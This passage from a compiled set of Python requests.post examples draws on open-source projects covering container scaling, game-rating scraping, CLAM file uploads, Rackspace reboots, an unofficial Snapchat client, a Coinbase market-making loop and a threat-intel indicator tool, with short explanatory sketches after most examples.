                # - scale the application capacity up
                #
                js = \
                    {
                        'instances': target
                    }

                url = 'http://%s/v2/apps/%s' % (master, app)
                reply = put(url, data=json.dumps(js), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'update failed (HTTP %d)' % code

                #
                # - wait for all our new pods to be there
                #
                @retry(timeout=self.timeout, pause=3, default={})
                def _spin():
                    def _query(zk):
                        replies = fire(zk, self.cluster, 'info')
                        return [seq for seq, _, _ in replies.values()]

                    js = run(self.proxy, _query)
                    assert len(js) == target, 'not all pods running yet'
                    return js

                _spin()

            elif target < total:

                #
                # - if the fifo switch is on make sure to pick the oldest pods for deletion
                #
                tasks = tasks[:total - target] if self.fifo else tasks[target:]

                #
                # - kill all (or part of) the pods using a POST /control/kill
                # - wait for them to be dead
                #
                @retry(timeout=self.timeout, pause=0)
                def _spin():
                    def _query(zk):
                        indices = [seq for (seq, _) in tasks]
                        replies = fire(zk, self.cluster, 'control/kill', subset=indices, timeout=self.timeout)
                        return [(code, seq) for seq, _, code in replies.values()]

                    #
                    # - fire the request to one or more pods
                    # - wait for every pod to report back a HTTP 410 (GONE)
                    # - this means the ochopod state-machine is now idling (e.g dead)
                    #
                    js = run(self.proxy, _query)
                    gone = sum(1 for code, _ in js if code == 410)
                    assert gone == len(js), 'at least one pod is still running'
                    return

                _spin()

                #
                # - delete all the underlying tasks at once using POST v2/tasks/delete
                #
                js = \
                    {
                        'ids': [task for (_, task) in tasks]
                    }

                url = 'http://%s/v2/tasks/delete?scale=true' % master
                reply = post(url, data=json.dumps(js), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'delete failed (HTTP %d)' % code

            self.out['ok'] = True

        except AssertionError as failure:

            logger.debug('%s : failed to scale -> %s' % (self.cluster, failure))

        except Exception as failure:

            logger.debug('%s : failed to scale -> %s' % (self.cluster, diagnostic(failure)))
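
Stripped of the pod bookkeeping, the two Marathon calls above have a simple shape: a PUT on /v2/apps/<app> to raise the instance count, and a POST on /v2/tasks/delete?scale=true to shrink it. A sketch under the assumption of a reachable Marathon master (host and identifiers below are placeholders):

import json
import requests

master = 'marathon.example.com:8080'  # hypothetical master host:port
headers = {'content-type': 'application/json', 'accept': 'application/json'}

# Scale up: set the desired instance count on the application.
requests.put('http://%s/v2/apps/%s' % (master, 'my-app'),
             data=json.dumps({'instances': 5}), headers=headers)

# Scale down: delete specific tasks and let Marathon adjust the count.
requests.post('http://%s/v2/tasks/delete?scale=true' % master,
              data=json.dumps({'ids': ['task-1', 'task-2']}), headers=headers)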

Example 34

Project: rocket-league-replays Source File: unofficial_api.py
def get_league_data(steam_ids):
    """
    Season 1:
    Playlist=0&Mu=20.6591&Sigma=4.11915&RankPoints=100
    Playlist=10&Mu=27.0242&Sigma=2.96727&RankPoints=292
    Playlist=11&Mu=37.0857&Sigma=2.5&RankPoints=618
    Playlist=12&Mu=35.8244&Sigma=2.5&RankPoints=500
    Playlist=13&Mu=33.5018&Sigma=2.5&RankPoints=468
    """

    """
    Season 2:
    Playlist=0&Mu=20.6134&Sigma=3.2206&Tier=
    Playlist=10&Mu=24.9755&Sigma=2.5&Tier=
    Playlist=11&Mu=29.3782&Sigma=2.5&Tier=
    Playlist=12&Mu=34.4383&Sigma=2.5&Tier=
    Playlist=13&Mu=34.5306&Sigma=2.5&Tier=
    """

    """
    Season 2, Patch 1.13:
    Playlist=0&Mu=25.6939&Sigma=2.5&Tier=&Division=&MatchesPlayed=&MMR=
    Playlist=10&Mu=31.8213&Sigma=4.88486&Tier=5&Division=0&MatchesPlayed=11&MMR=17.1667
    Playlist=11&Mu=25.0579&Sigma=2.5&Tier=5&Division=0&MatchesPlayed=31&MMR=17.5579
    Playlist=12&Mu=29.5139&Sigma=3.75288&Tier=0&Division=0&MatchesPlayed=7&MMR=18.2552
    Playlist=13&Mu=27.0215&Sigma=2.5&Tier=5&Division=0&MatchesPlayed=27&MMR=19.5215
    """

    all_steam_ids = list(steam_ids)

    for steam_ids in chunks(all_steam_ids, 10):
        data = {
            'Proc[]': [
                'GetPlayerSkillSteam'
            ] * len(steam_ids),
        }

        for index, steam_id in enumerate(steam_ids):
            data['P{}P[]'.format(index)] = [str(steam_id)]

        headers = api_login()
        r = requests.post(
            API_BASE + '/callproc{}/'.format(API_VERSION),
            headers=headers,
            data=data
        )

        if r.text.strip() == 'SCRIPT ERROR SessionNotActive:':
            print('Hit SessionNotActive')
            cache.delete(CACHE_KEY)
            continue

        # Split the response into individual chunks.
        response_chunks = r.text.strip().split('\r\n\r\n')

        for index, response in enumerate(response_chunks):
            print('Getting rating data for', steam_ids[index])
            matches = re.findall(r'Playlist=(\d{1,2})&Mu=([0-9\.]+)&Sigma=([0-9\.]+)&Tier=(\d*)&Division=(\d?)&MatchesPlayed=(\d*)&MMR=([0-9\.]*)', response)

            if not matches:
                print('no matches')
                continue

            has_tiers = False
            matches_dict = {}

            for match in matches:
                playlist, mu, sigma, tier, division, matches_played, mmr = match

                if tier != '' and tier != '0':
                    has_tiers = True

                    matches_dict[playlist] = {
                        'mu': mu,
                        'sigma': sigma,
                        'tier': tier,
                        'division': division,
                        'matches_played': matches_played,
                        'mmr': mmr,
                    }

            if not has_tiers:
                print('No tiers')
                continue

            object_data = {}

            if str(settings.PLAYLISTS['RankedDuels']) in matches_dict:
                object_data['duels'] = matches_dict[str(settings.PLAYLISTS['RankedDuels'])]['tier']
                object_data['duels_division'] = matches_dict[str(settings.PLAYLISTS['RankedDuels'])]['division']
                object_data['duels_matches_played'] = matches_dict[str(settings.PLAYLISTS['RankedDuels'])]['matches_played']

                if matches_dict[str(settings.PLAYLISTS['RankedDuels'])]['mmr'] != '':
                    object_data['duels_mmr'] = matches_dict[str(settings.PLAYLISTS['RankedDuels'])]['mmr']
            else:
                object_data['duels'] = 0

            if str(settings.PLAYLISTS['RankedDoubles']) in matches_dict:
                object_data['doubles'] = matches_dict[str(settings.PLAYLISTS['RankedDoubles'])]['tier']
                object_data['doubles_division'] = matches_dict[str(settings.PLAYLISTS['RankedDoubles'])]['division']
                object_data['doubles_matches_played'] = matches_dict[str(settings.PLAYLISTS['RankedDoubles'])]['matches_played']

                if matches_dict[str(settings.PLAYLISTS['RankedDoubles'])]['mmr'] != '':
                    object_data['doubles_mmr'] = matches_dict[str(settings.PLAYLISTS['RankedDoubles'])]['mmr']
            else:
                object_data['doubles'] = 0

            if str(settings.PLAYLISTS['RankedSoloStandard']) in matches_dict:
                object_data['solo_standard'] = matches_dict[str(settings.PLAYLISTS['RankedSoloStandard'])]['tier']
                object_data['solo_standard_division'] = matches_dict[str(settings.PLAYLISTS['RankedSoloStandard'])]['division']
                object_data['solo_standard_matches_played'] = matches_dict[str(settings.PLAYLISTS['RankedSoloStandard'])]['matches_played']

                if matches_dict[str(settings.PLAYLISTS['RankedSoloStandard'])]['mmr'] != '':
                    object_data['solo_standard_mmr'] = matches_dict[str(settings.PLAYLISTS['RankedSoloStandard'])]['mmr']
            else:
                object_data['solo_standard'] = 0

            if str(settings.PLAYLISTS['RankedStandard']) in matches_dict:
                object_data['standard'] = matches_dict[str(settings.PLAYLISTS['RankedStandard'])]['tier']
                object_data['standard_division'] = matches_dict[str(settings.PLAYLISTS['RankedStandard'])]['division']
                object_data['standard_matches_played'] = matches_dict[str(settings.PLAYLISTS['RankedStandard'])]['matches_played']

                if matches_dict[str(settings.PLAYLISTS['RankedStandard'])]['mmr'] != '':
                    object_data['standard_mmr'] = matches_dict[str(settings.PLAYLISTS['RankedStandard'])]['mmr']
            else:
                object_data['standard'] = 0

            print(object_data)

            # Store this rating.
            LeagueRating.objects.create(
                steamid=steam_ids[index],
                **object_data
            )
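
The data dict above leans on how requests encodes list values: a key mapped to a list is emitted once per element in the form body, which is what builds the batched Proc[] calls. A standalone illustration of that encoding (httpbin.org used purely as an echo endpoint):

import requests

# A list value is serialized as repeated form fields, i.e.
# Proc[]=GetPlayerSkillSteam&Proc[]=GetPlayerSkillSteam&P0P[]=...
data = {
    'Proc[]': ['GetPlayerSkillSteam'] * 2,
    'P0P[]': ['76561198000000000'],  # made-up steam ids
    'P1P[]': ['76561198000000001'],
}

r = requests.post('https://httpbin.org/post', data=data)
print(r.json()['form'])  # echoes the repeated fields back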

Example 35

Project: clam Source File: client.py
    def addinputfile(self, project, inputtemplate, sourcefile, **kwargs):
        """Add/upload an input file to the CLAM service. Supports proper file upload streaming.

        project - the ID of the project you want to add the file to.
        inputtemplate - The input template you want to use to add this file (InputTemplate instance)
        sourcefile - The file you want to add: string containing a filename (or instance of ``file``)

        Keyword arguments (optional but recommended!):
            * ``filename`` - the filename on the server (will be same as sourcefile if not specified)
            * ``metadata`` - A metadata object.
            * ``metafile`` - A metadata file (filename)

        Any other keyword arguments will be passed as metadata and matched with the input template's parameters.

        Example::

            client.addinputfile("myproject", "someinputtemplate", "/path/to/local/file")

        With metadata, assuming such metadata parameters are defined::

            client.addinputfile("myproject", "someinputtemplate", "/path/to/local/file", parameter1="blah", parameterX=3.5)

        """
        if isinstance( inputtemplate, str) or (sys.version < '3' and isinstance( inputtemplate, unicode)): #pylint: disable=undefined-variable
            data = self.get(project) #causes an extra query to server
            inputtemplate = data.inputtemplate(inputtemplate)
        elif not isinstance(inputtemplate, clam.common.data.InputTemplate):
            raise Exception("inputtemplate must be instance of InputTemplate. Get from CLAMData.inputtemplate(id)")

        if not isinstance(sourcefile, IOBase):
            sourcefile = open(sourcefile,'rb')
        if 'filename' in kwargs:
            filename = self.getinputfilename(inputtemplate, kwargs['filename'])
        else:
            filename = self.getinputfilename(inputtemplate, os.path.basename(sourcefile.name) )

        data = {"file": (filename,sourcefile,inputtemplate.formatclass.mimetype), 'inputtemplate': inputtemplate.id}
        for key, value in kwargs.items():
            if key == 'filename':
                pass #nothing to do
            elif key == 'metadata':
                assert isinstance(value, clam.common.data.CLAMMetaData)
                data['metadata'] =  value.xml()
            elif key == 'metafile':
                data['metafile'] = open(value,'rb')
            else:
                data[key] = value


        requestparams = self.initrequest(data)
        if 'auth' in requestparams:
            #TODO: streaming support doesn't work with authentication unfortunately, disabling streaming for now:
            del data['file']
            requestparams['data'] = data
            requestparams['files'] = [('file', (filename,sourcefile, inputtemplate.formatclass.mimetype))]
            if 'metafile' in kwargs:
                del data['metafile']
                requestparams['files'].append(('metafile',('.'+ filename + '.METADATA', open(kwargs['metafile'],'rb'), 'text/xml')))
        else:
            #streaming support
            encodeddata = MultipartEncoder(fields=requestparams['data']) #from requests-toolbelt, necessary for streaming support
            requestparams['data'] = encodeddata
            requestparams['headers']['Content-Type'] = encodeddata.content_type
        r = requests.post(self.url + project + '/input/' + filename,**requestparams)
        sourcefile.close()

        if r.status_code == 400:
            raise clam.common.data.BadRequest()
        elif r.status_code == 401:
            raise clam.common.data.AuthRequired()
        elif r.status_code == 403:
            if r.text[0] == '<':
                #XML response
                return self._parseupload(r.text)
            else:
                raise clam.common.data.PermissionDenied(r.text)
        elif r.status_code == 404:
            raise clam.common.data.NotFound(r.text)
        elif r.status_code == 500:
            raise clam.common.data.ServerError(r.text)
        elif r.status_code == 405:
            raise clam.common.data.ServerError("Server returned 405: Method not allowed for POST on " + self.url + project + '/input/' + filename)
        elif r.status_code == 408:
            raise clam.common.data.TimeOut()
        elif not (r.status_code >= 200 and r.status_code <= 299):
            raise Exception("An error occured, return code " + str(r.status_code))

        return self._parseupload(r.text)
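
The streaming branch above relies on requests-toolbelt: wrapping the fields in a MultipartEncoder lets requests read the file lazily instead of buffering it in memory. A minimal sketch of that pattern, with a made-up URL, project and field names:

import requests
from requests_toolbelt import MultipartEncoder

# The encoder streams the open file rather than loading it whole.
encoder = MultipartEncoder(fields={
    'inputtemplate': 'sometemplate',
    'file': ('data.txt', open('data.txt', 'rb'), 'text/plain'),
})

r = requests.post('https://clam.example.org/myproject/input/data.txt',
                  data=encoder,
                  headers={'Content-Type': encoder.content_type})
r.raise_for_status()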

Example 36

Project: runbook Source File: __init__.py
Function: call_action
def call_action(redata, jdata, logger):
    ''' Perform actual call '''

    # Authenticate with Rackspace ID service
    headers = {'Content-Type': 'application/json'}
    authmsg = {
        "auth": {
            "RAX-KSKEY:apiKeyCredentials": {
                "username": redata['data']['username'],
                "apiKey": redata['data']['apikey']
            }
        }
    }
    payload = json.dumps(authmsg)
    url = "https://identity.api.rackspacecloud.com/v2.0/tokens"
    try:
        req = requests.post(
            url, timeout=10.0, data=payload, headers=headers, verify=True)
        retdata = json.loads(req.text)
        # Check Status code and grab required fields from auth data
        if req.status_code == 200:
            token = retdata['access']['token']['id']
            for catalog in retdata['access']['serviceCatalog']:
                if catalog['name'] == redata['data']['resource_type']:
                    for endpoint in catalog['endpoints']:
                        if endpoint['region'] == redata['data']['region']:
                            url = endpoint['publicURL'] + "/servers/" + redata['data']['serverid'] + "/action"
            # Send Reboot Request
            headers = {
                "X-Auth-Token": token,
                "Content-Type": "application/json"
            }
            msg = {
                "reboot": {
                    "type": "HARD"
                }
            }
            payload = json.dumps(msg)
            try:
                req = requests.post(
                    url, timeout=10.0, data=payload,
                    headers=headers, verify=True)
            except:
                line = "rackspace-powercycle: False Rackspace API Call for reaction %s" % (redata['id'])
                logger.info(line)
                return False
        else:
            line = "rackspace-powercycle: False Rackspace Authenticaiton for reaction %s" % (redata['id'])
            logger.info(line)
            return False
    except:
        line = "rackspace-powercycle: False Rackspace Authenticaiton for reaction %s" % (redata['id'])
        logger.info(line)
        return False
    if req.status_code == 202:
        line = "rackspace-powercycle: Reqeust to %s sent for monitor %s - Successful" % (url, jdata['cid'])
        logger.info(line)
        return True
    else:
        line = "rackspace-powercycle: Request to %s sent for monitor %s - False" % (url, jdata['cid'])
        logger.info(line)
        return False
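
The reaction above is a common two-step shape: POST credentials to an identity endpoint, pull a token out of the JSON response, then POST the actual action with the token in a header. Reduced to a sketch (the token path follows the Rackspace response format shown above; other services will differ):

import json
import requests

auth_url = 'https://identity.api.rackspacecloud.com/v2.0/tokens'
auth_body = {'auth': {'RAX-KSKEY:apiKeyCredentials': {'username': 'user', 'apiKey': 'key'}}}

req = requests.post(auth_url, timeout=10.0, data=json.dumps(auth_body),
                    headers={'Content-Type': 'application/json'})
token = req.json()['access']['token']['id']

# Re-use the token on the follow-up call (hypothetical action URL).
action = requests.post('https://compute.example.invalid/servers/SERVER_ID/action',
                       timeout=10.0, data=json.dumps({'reboot': {'type': 'HARD'}}),
                       headers={'X-Auth-Token': token, 'Content-Type': 'application/json'})
print(action.status_code)  # 202 means the reboot request was accepted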

Example 37

Project: snapy Source File: utils.py
Function: request
def request(endpoint, auth_token, data=None, params=None, files=None,
            raise_for_status=True, req_type='post', moreheaders={}):
    """Wrapper method for calling Snapchat API which adds the required auth
    token before sending the request.

    :param endpoint: URL for API endpoint
    :param data: Dictionary containing form data
    :param raise_for_status: Raise exception for 4xx and 5xx status codes
    :param req_type: The request type (GET, POST). Defaults to POST
    """
    if params is not None:
        if 'now' in params:
            now = params['now']
        else:
            now = str(timestamp())

        if 'gauth' in params:
            gauth = params['gauth']
        else:
            gauth = ""
    else:
        now = str(timestamp())
        gauth = ""

    if data is None:
        data = {}
    
    headers = {
        'User-Agent': 'Snapchat/9.16.2.0 (HTC One; Android 5.0.2#482424.2#21; gzip)',
        'Accept-Language': 'en',
        'Accept-Locale': 'en_US',
        'X-Snapchat-Client-Auth-Token': "Bearer " + gauth
    }

    headers.update(moreheaders) 

    URL = 'https://feelinsonice-hrd.appspot.com'
    
    if endpoint == '/loq/login':
        headers.update({
            'Accept-Encoding': 'gzip'
            })

    if endpoint == '/bq/blob':
        headers.update({
            'X-Timestamp': now
            })

    if endpoint == '/loq/login' or endpoint == '/loq/device_id':
        req_token = make_request_token(STATIC_TOKEN, now)
    else:
        req_token = make_request_token(auth_token, now)

    if endpoint != '/bq/story_blob':
        data.update({
            'timestamp': now,
            'req_token': req_token
        })

    if req_type == 'post':
        r = requests.post(URL + endpoint, data=data, files=files,
                          headers=headers, verify=False)
    else:
        if gauth == "": headers = None
        r = requests.get(URL + endpoint, params=data, headers=headers, verify=False)
    if raise_for_status:
        r.raise_for_status()
    return r
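
The wrapper above illustrates a pattern worth keeping: centralize the base URL, default headers and status handling in one function so that call sites stay small. A stripped-down sketch of the same idea (names and base URL are illustrative, not from the project):

import requests

BASE_URL = 'https://api.example.com'  # hypothetical service root

def post(endpoint, data=None, headers=None, raise_for_status=True, **kwargs):
    """POST to BASE_URL + endpoint with merged default headers."""
    merged = {'User-Agent': 'my-client/1.0'}
    merged.update(headers or {})
    r = requests.post(BASE_URL + endpoint, data=data, headers=merged, **kwargs)
    if raise_for_status:
        r.raise_for_status()
    return r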

Example 38

Project: coinbase-exchange-order-book Source File: strategies.py
def market_maker_strategy(open_orders, order_book, spreads):
    time.sleep(10)
    open_orders.get_open_orders()
    open_orders.cancel_all()
    while True:
        time.sleep(0.005)
        if order_book.asks.price_tree.min_key() - order_book.bids.price_tree.max_key() < 0:
            file_logger.warn('Negative spread: {0}'.format(
                order_book.asks.price_tree.min_key() - order_book.bids.price_tree.max_key()))
            continue
        if not open_orders.open_bid_order_id:
            open_bid_price = order_book.asks.price_tree.min_key() - spreads.bid_spread - open_orders.open_bid_rejections
            if 0.01 * float(open_bid_price) < float(open_orders.accounts['USD']['available']):
                order = {'size': '0.01',
                         'price': str(open_bid_price),
                         'side': 'buy',
                         'product_id': 'BTC-USD',
                         'post_only': True}
                response = requests.post(exchange_api_url + 'orders', json=order, auth=exchange_auth)
                if 'status' in response.json() and response.json()['status'] == 'pending':
                    open_orders.open_bid_order_id = response.json()['id']
                    open_orders.open_bid_price = open_bid_price
                    open_orders.open_bid_rejections = Decimal('0.0')
                    file_logger.info('new bid @ {0}'.format(open_bid_price))
                elif 'status' in response.json() and response.json()['status'] == 'rejected':
                    open_orders.open_bid_order_id = None
                    open_orders.open_bid_price = None
                    open_orders.open_bid_rejections += Decimal('0.04')
                    file_logger.warn('rejected: new bid @ {0}'.format(open_bid_price))
                elif 'message' in response.json() and response.json()['message'] == 'Insufficient funds':
                    open_orders.open_bid_order_id = None
                    open_orders.open_bid_price = None
                    file_logger.warn('Insufficient USD')
                else:
                    file_logger.error('Unhandled response: {0}'.format(pformat(response.json())))
                continue

        if not open_orders.open_ask_order_id:
            open_ask_price = order_book.bids.price_tree.max_key() + spreads.ask_spread + open_orders.open_ask_rejections
            if 0.01 < float(open_orders.accounts['BTC']['available']):
                order = {'size': '0.01',
                         'price': str(open_ask_price),
                         'side': 'sell',
                         'product_id': 'BTC-USD',
                         'post_only': True}
                response = requests.post(exchange_api_url + 'orders', json=order, auth=exchange_auth)
                if 'status' in response.json() and response.json()['status'] == 'pending':
                    open_orders.open_ask_order_id = response.json()['id']
                    open_orders.open_ask_price = open_ask_price
                    file_logger.info('new ask @ {0}'.format(open_ask_price))
                    open_orders.open_ask_rejections = Decimal('0.0')
                elif 'status' in response.json() and response.json()['status'] == 'rejected':
                    open_orders.open_ask_order_id = None
                    open_orders.open_ask_price = None
                    open_orders.open_ask_rejections += Decimal('0.04')
                    file_logger.warn('rejected: new ask @ {0}'.format(open_ask_price))
                elif 'message' in response.json() and response.json()['message'] == 'Insufficient funds':
                    open_orders.open_ask_order_id = None
                    open_orders.open_ask_price = None
                    file_logger.warn('Insufficient BTC')
                else:
                    file_logger.error('Unhandled response: {0}'.format(pformat(response.json())))
                continue

        if open_orders.open_bid_order_id and not open_orders.open_bid_cancelled:
            bid_too_far_out = open_orders.open_bid_price < (order_book.asks.price_tree.min_key()
                                                            - spreads.bid_too_far_adjustment_spread)
            bid_too_close = open_orders.open_bid_price > (order_book.bids.price_tree.max_key()
                                                          - spreads.bid_too_close_adjustment_spread)
            cancel_bid = bid_too_far_out or bid_too_close
            if cancel_bid:
                if bid_too_far_out:
                    file_logger.info('CANCEL: open bid {0} too far from best ask: {1} spread: {2}'.format(
                        open_orders.open_bid_price,
                        order_book.asks.price_tree.min_key(),
                        open_orders.open_bid_price - order_book.asks.price_tree.min_key()))
                if bid_too_close:
                    file_logger.info('CANCEL: open bid {0} too close to best bid: {1} spread: {2}'.format(
                        open_orders.open_bid_price,
                        order_book.bids.price_tree.max_key(),
                        open_orders.open_bid_price - order_book.bids.price_tree.max_key()))
                open_orders.cancel('bid')
                continue

        if open_orders.open_ask_order_id and not open_orders.open_ask_cancelled:
            ask_too_far_out = open_orders.open_ask_price > (order_book.bids.price_tree.max_key() +
                                                            spreads.ask_too_far_adjustment_spread)

            ask_too_close = open_orders.open_ask_price < (order_book.asks.price_tree.min_key() -
                                                          spreads.ask_too_close_adjustment_spread)

            cancel_ask = ask_too_far_out or ask_too_close

            if cancel_ask:
                if ask_too_far_out:
                    file_logger.info('CANCEL: open ask {0} too far from best bid: {1} spread: {2}'.format(
                        open_orders.open_ask_price,
                        order_book.bids.price_tree.max_key(),
                        open_orders.open_ask_price - order_book.bids.price_tree.max_key()))
                if ask_too_close:
                    file_logger.info('CANCEL: open ask {0} too close to best ask: {1} spread: {2}'.format(
                        open_orders.open_ask_price,
                        order_book.asks.price_tree.min_key(),
                        open_orders.open_ask_price - order_book.asks.price_tree.min_key()))
                open_orders.cancel('ask')
                continue
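
Note that the order submissions above use the json= keyword rather than data=: requests serializes the dict and sets the Content-Type header to application/json on its own, which is why no explicit header appears in the example. A side-by-side sketch of the two equivalent spellings (httpbin.org as a stand-in endpoint):

import json
import requests

order = {'size': '0.01', 'price': '100.00', 'side': 'buy'}

# json= handles both serialization and the Content-Type header.
r1 = requests.post('https://httpbin.org/post', json=order)

# data= requires doing both by hand.
r2 = requests.post('https://httpbin.org/post', data=json.dumps(order),
                   headers={'Content-Type': 'application/json'})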

Example 39

Project: ochonetes Source File: io.py
Function: fire
def fire(zk, cluster, command, subset=None, timeout=10.0, js=None):
    """
    Helper that looks up zero or more pods and fires an HTTP control request to each one in parallel. The pod control
    port will be looked up & remapped automatically. The outcome is a dict keying a compound identifier (cluster + pod
    sequence index) to a tuple holding the pod sequence index, its response body and the corresponding HTTP code.

    By default the external IP address is used to reach the pods. This can be reverted so that the internal IP is
    used by setting the $OCHOPOD_USE_INTERNAL_IPS environment variable (typically to run tools from within the
    cluster).

    :type zk: :class:`kazoo.client.KazooClient`
    :type cluster: str
    :type command: str
    :type subset: list
    :type timeout: float
    :param zk: the underlying zookeeper client
    :param cluster: the cluster(s) to query, as a glob pattern (e.g "*.zookeeper")
    :param subset: optional integer array used to select specific pods based on their sequence index
    :param timeout: optional timeout in seconds
    :rtype: dict
    """

    class _Post(Thread):
        """
        We optimize the HTTP queries to the pods a bit by running them on separate threads (firing more than
        10 queries in a row can otherwise be a tad slow)
        """

        def __init__(self, key, hints):
            super(_Post, self).__init__()

            self.key = key
            self.hints = hints
            self.body = None
            self.code = None

            self.start()

        def run(self):

            url = 'N/A'
            try:
                ts = time.time()
                port = self.hints['port']
                assert port in self.hints['ports'], 'ochopod control port not exposed @ %s (user error ?)' % self.key
                url = 'http://%s:%d/%s' % (self.hints['ip'], self.hints['ports'][port], command)
                reply = requests.post(url, timeout=timeout, data=js)
                self.body = reply.json()
                self.code = reply.status_code
                ms = 1000 * (time.time() - ts)
                logger.debug('-> %s (HTTP %d, %s ms)' % (url, reply.status_code, int(ms)))

            except HTTPTimeout:
                logger.debug('-> %s (timeout)' % url)

            except Exception as failure:
                logger.debug('-> %s (i/o error, %s)' % (url, failure))

        def join(self, timeout=None):

            Thread.join(self)
            return self.key, self.hints['seq'], self.body, self.code

    #
    # - lookup our pods based on the cluster(s) we want
    # - fire a thread for each
    #
    pods = lookup(zk, cluster, subset=subset)
    threads = [_Post(pod, hints) for pod, hints in pods.items()]
    out = [thread.join() for thread in threads]
    return {key: (seq, body, code) for (key, seq, body, code) in out if code}
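
The _Post class above fans identical POSTs out to the pods on one thread each and joins the results. On recent Python versions the same fan-out can be sketched with concurrent.futures (this is an alternative rendering, not the project's code; the pod URLs are placeholders):

import requests
from concurrent.futures import ThreadPoolExecutor

urls = ['http://10.0.0.%d:8080/info' % i for i in (1, 2, 3)]  # hypothetical pods

def fire_one(url):
    try:
        reply = requests.post(url, timeout=10.0)
        return url, reply.status_code, reply.json()
    except requests.RequestException as failure:
        return url, None, str(failure)

# Each POST runs on its own worker thread, mirroring the _Post threads above.
with ThreadPoolExecutor(max_workers=8) as pool:
    results = list(pool.map(fire_one, urls))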

Example 40

Project: clam Source File: client.py
Function: add_input
    def addinput(self, project, inputtemplate, contents, **kwargs):
        """Add an input file to the CLAM service. Explictly providing the contents as a string. This is not suitable for large files as the contents are kept in memory! Use ``addinputfile()`` instead for large files.

        project - the ID of the project you want to add the file to.
        inputtemplate - The input template you want to use to add this file (InputTemplate instance)
        contents - The contents for the file to add (string)

        Keyword arguments:
            * filename - the filename on the server (mandatory!)
            * metadata - A metadata object.
            * metafile - A metadata file (filename)

        Any other keyword arguments will be passed as metadata and matched with the input template's parameters.

        Example::

            client.addinput("myproject", "someinputtemplate", "This is a test.", filename="test.txt")

        With metadata, assuming such metadata parameters are defined::

            client.addinput("myproject", "someinputtemplate", "This is a test.", filename="test.txt", parameter1="blah", parameterX=3.5))

        """
        if isinstance( inputtemplate, str) or (sys.version < '3' and isinstance( inputtemplate, unicode)): #pylint: disable=undefined-variable
            data = self.get(project) #causes an extra query to server
            inputtemplate = data.inputtemplate(inputtemplate)
        elif not isinstance(inputtemplate, clam.common.data.InputTemplate):
            raise Exception("inputtemplate must be instance of InputTemplate. Get from CLAMData.inputtemplate(id)")


        if 'filename' in kwargs:
            filename = self.getinputfilename(inputtemplate, kwargs['filename'])
        else:
            raise Exception("No filename provided!")

        data = {"contents": contents, 'inputtemplate': inputtemplate.id}
        for key, value in kwargs.items():
            if key == 'filename':
                pass #nothing to do
            elif key == 'metadata':
                assert isinstance(value, clam.common.data.CLAMMetaData)
                data['metadata'] =  value.xml()
            elif key == 'metafile':
                data['metafile'] = open(value,'r')
            else:
                data[key] = value


        requestparams = self.initrequest(data)
        r = requests.post(self.url + project + '/input/' + filename,**requestparams)

        if r.status_code == 400:
            raise clam.common.data.BadRequest()
        elif r.status_code == 401:
            raise clam.common.data.AuthRequired()
        elif r.status_code == 403:
            if r.text[0] == '<':
                #XML response
                return self._parseupload(r.text)
            else:
                raise clam.common.data.PermissionDenied(r.text)
        elif r.status_code == 404:
            raise clam.common.data.NotFound(r.text)
        elif r.status_code == 500:
            raise clam.common.data.ServerError(r.text)
        elif r.status_code == 405:
            raise clam.common.data.ServerError("Server returned 405: Method not allowed for POST on " + self.url + project + '/input/' + filename)
        elif r.status_code == 408:
            raise clam.common.data.TimeOut()
        elif not (r.status_code >= 200 and r.status_code <= 299):
            raise Exception("An error occured, return code " + str(r.status_code))

        return self._parseupload(r.text)
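
The long if/elif ladder closing both CLAM examples maps HTTP status codes to library exceptions. Where the mapping is one-to-one it can be flattened into a dict lookup; a sketch of that refactor (the exception classes below are stand-ins, not CLAM's actual hierarchy):

import requests

class BadRequest(Exception): pass
class AuthRequired(Exception): pass
class NotFound(Exception): pass
class ServerError(Exception): pass

ERRORS = {400: BadRequest, 401: AuthRequired, 404: NotFound, 500: ServerError}

def check(r):
    """Raise the mapped exception for known codes, a generic one otherwise."""
    if r.status_code in ERRORS:
        raise ERRORS[r.status_code](r.text)
    if not 200 <= r.status_code <= 299:
        raise Exception('An error occurred, return code %d' % r.status_code)
    return r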

Example 41

Project: threatshell Source File: threat_q.py
Function: add_indicator
    def add_indicator(self, args):

        type_map = self._get_type_map()
        status_map = self._get_status_map()

        parser = argparse.ArgumentParser(usage="tq_add")
        parser.add_argument(
            "indicator",
            action="store",
            help="Specify the indicator to be added"
        )

        parser.add_argument(
            "-c",
            "--class_type",
            action="store",
            choices=["network", "host"],
            metavar="TYPE",
            required=True,
            help=(
                "Specify indicator class. Valid choices are: %s"
            ) % ", ".join(["network", "host"])
        )

        parser.add_argument(
            "-t",
            "--type",
            action="store",
            choices=type_map.keys(),
            metavar="TYPE",
            required=True,
            help=(
                "Specify the indicator type. Valid choices are: %s"
            ) % (", ".join(type_map.keys()))
        )

        parser.add_argument(
            "-s",
            "--status",
            action="store",
            choices=status_map.keys(),
            metavar="STATUS",
            required=True,
            help=(
                "Specify the indicator status. Valid choices are: %s"
            ) % ", ".join(status_map.keys())
        )

        try:
            parsed_args = parser.parse_args(args=shlex.split(args))
        except SystemExit, e:
            if str(e) != "0":
                log.error(
                    "Invalid argument for query (use -h or --help " +
                    "to see command options)"
                )
            return {}

        query_url = "%s/api/indicators/" % self.url
        params = {
            "api_key": self.key,
            "indicator": parsed_args.indicator,
            "indicator_class": parsed_args.class_type,
            "indicator_type_id": str(type_map[parsed_args.type]),
            "indicator_status_id": str(status_map[parsed_args.status])
        }

        r = requests.post(
            query_url,
            params=params,
            verify=False
        )

        if r.status_code != 200:
            log.error("[tqadd] Got back status code %s" % r.status_code)
            return {
                parsed_args.indicator: "Failed with error code %s" % (
                    r.status_code
                )
            }

        rc = r.content
        if not rc:
            return "No reply"
        return rc
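
One detail worth calling out above: the API key and indicator fields are passed via params=, so although this is a POST they travel in the URL query string, not in the request body. A minimal illustration of the difference (httpbin.org as an echo endpoint):

import requests

# params= appends a query string to the URL even on a POST;
# use data= (or json=) when the server expects a request body instead.
r = requests.post('https://httpbin.org/post',
                  params={'api_key': 'KEY', 'indicator': 'evil.example.com'})
print(r.json()['args'])  # the fields arrive as query parameters
print(r.json()['form'])  # the form body stays empty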

Example 42

Project: pyuClassify Source File: uclassify.py
    def classifyKeywords(self,texts,classifierName,username = None):
        """Performs classification on texts.
           :param texts: (required) A List of texts that needs to be classified.
           :param classifierName: (required) Classifier Name
           :param username: (optional): Name of the user, under whom the classifier exists.
        """
        doc,root_element = self._buildbasicXMLdoc()
